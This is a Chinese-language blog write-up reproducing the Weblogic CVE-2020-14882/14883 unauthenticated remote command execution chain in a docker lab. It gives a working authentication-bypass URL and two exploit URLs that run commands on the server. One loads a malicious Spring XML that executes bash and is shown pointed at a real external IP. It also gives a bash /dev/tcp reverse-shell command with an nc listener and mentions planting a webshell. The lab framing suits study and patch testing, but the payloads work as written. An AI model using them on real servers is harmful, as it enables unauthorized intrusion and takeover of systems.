Weblogic未授权远程命令执行漏洞(CVE-2020-14882&CVE-2020-14883)复现
– 因果 2021.3.5
漏洞简介
Weblogic是Oracle公司推出的J2EE应用服务器,CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令
参考链接:
- https://www.oracle.com/security-alerts/cpuoct2020traditional.html
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
影响范围
Oracle:Weblogic : 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
环境搭建
使用docker+vulhub搭建环境
docker启动一个Weblogic 12.2.1.3版本的服务器:
docker-compose up -d
访问 http://your-ip:7001/console
漏洞复现
首先利用权限绕过漏洞 CVE-2020-1488 ,
访问URL,即可未授权访问到管理后台页面:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
此时是低权限的用户,无法安装应用,也无法直接执行任意代码
利用到第二个漏洞CVE-2020-14883。
两种利用方式
一是通过
com.tangosol.coherence.mvel2.sh.ShellSession
二是通
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession
执行命令:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
进入容器,可以发现touch /tmp/success1
已成功执行:
利用这种方式 我们就可以创建一句话木马 获取网站shell
第二种利用
这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession
类
首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[touch /tmp/success2]]></value>
</list>
</constructor-arg>
</bean>
</beans>
然后通过URL,即可让Weblogic加载这个XML,并执行其中的命令
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://example.com/rce.xml”)
我的payload:
http://182.61.132.133:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://182.61.132.133/exp.xml”)
利用这种方式 反弹shell
修改 xml中的命令部分为反弹shell
bash -i >& /dev/tcp/ip/port 0>&1
使用nc 建立监听
nc -lvvp 4444
使用url访问
成功反弹shell